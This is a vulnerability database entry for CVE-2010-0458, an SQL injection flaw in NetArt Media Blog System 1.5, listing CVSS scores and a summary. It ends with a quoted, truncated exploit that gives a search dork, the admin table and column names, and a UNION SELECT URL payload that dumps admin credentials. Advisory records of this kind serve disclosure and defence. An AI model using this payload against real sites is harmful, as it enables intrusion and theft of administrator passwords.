7.5
CVSSv2

CVE-2010-0458

Published: 28/01/2010 Updated: 17/08/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

Multiple SQL injection vulnerabilities in NetArt Media Blog System 1.5 allow remote malicious users to execute arbitrary SQL commands via the (1) cat parameter to index.php and the (2) note parameter to blog.php.

Vulnerable Product Search on Vulmon Subscribe to Product

netartmedia blog system 1.5

Exploits

[#] Script : Blog System [#] Version : 1x [#] Link : netartmedianet/blogsystem/ [#] Dork : "powered by Blog System" [#] Table : websiteadmin_admin_users [#] Columns : id,username,password,type [#] Exploit : /blogphp?user=[real-user]&note=-1549+union+all+select+1,2,3,concat_ws(0x3a,id,username,password,type),5,6,7,8,9+from+websiteadm ...